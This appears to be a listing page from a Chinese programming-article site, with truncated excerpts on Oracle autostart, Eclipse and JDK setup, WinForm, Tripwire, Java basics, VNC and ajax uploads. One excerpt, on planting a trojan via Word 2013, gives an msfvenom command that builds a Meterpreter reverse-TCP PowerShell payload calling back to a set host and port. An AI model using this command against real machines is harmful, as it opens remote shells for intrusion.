方法一、配置shell脚本,使用/etc/rc.local 跟随系统自启动 # cat /home/oracle/script/start.sh lsnrctl start<<EOF EOF sqlplus / as sysdba <<EOF startup alter system registe ...
分类:
数据库 时间:
2021-03-26 15:17:47
阅读次数:
0
1、下载Eclipse 下载地址:https://www.eclipse.org/downloads/ 2、下载JDK https://www.oracle.com/java/technologies/javase-downloads.html 3、配置JAVA环境变量 右键【我的电脑】 【属性】 ...
分类:
编程语言 时间:
2021-03-18 14:46:05
阅读次数:
0
Winform基础详解三——关于program.cs program是整个Winform程序的主入口点。 [STAThread] 表示一种当前应用程序的特性 表示当前COM线程模型是单线程单元 如果没有它,winform应用程序是无法工作的 using System; using System.Co ...
Tripwire is a host based Intrusion detection system for Linux. Tripwire monitors Linux system to detect and report any unauthorized changes to the fil ...
分类:
系统相关 时间:
2021-03-18 14:32:34
阅读次数:
0
1 package com.pingfan.scanner; 2 3 import java.util.Scanner; 4 5 public class Demo3 { 6 public static void main(String[] args) { 7 Scanner scanner = n ...
分类:
其他好文 时间:
2021-03-18 14:30:41
阅读次数:
0
环境: win7 64位,word2013 生成木马 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.64.135 LPORT=1122 -f psh-reflection >x.ps1 ? 放到VPS上,这里我们放到本机搭 ...
分类:
系统相关 时间:
2021-03-18 14:14:35
阅读次数:
0
HelloWord 新建文件夹,存放代码 新建一个Java文件 文件后缀名.java(Hello.java) 编写代码 public class Hello{ public static void main(String[] args){ System.out.print("Hello,world! ...
分类:
其他好文 时间:
2021-03-18 14:11:04
阅读次数:
0
xunxue1523 2020-02-27 21:22:18 3891 收藏 4分类专栏: javaweb 工具类 文章标签: Eclipse jee下载 提供国内清华大学镜像点下载 Eclipsejee国内下载 Eclipse 清华大学镜像点下载版权清华大学网站镜像网站资料https://mirr ...
分类:
系统相关 时间:
2021-03-18 14:03:04
阅读次数:
0
一、VNC环境搭建 安装vnc服务 yum -y install tigervnc tigervnc-server vnc服务配置——宿主机远程控制 # 配置vnc # 将/lib/systemd/system/vncserver@.service文件复制一份 cp /lib/systemd/sys ...
https://blog.csdn.net/sinat_16998945/article/details/81125950 界面如下图: HTML代码如下: <html ><head > <!-- 引入jquery ajaxfileupload.js --> <!-- ajaxfileupload. ...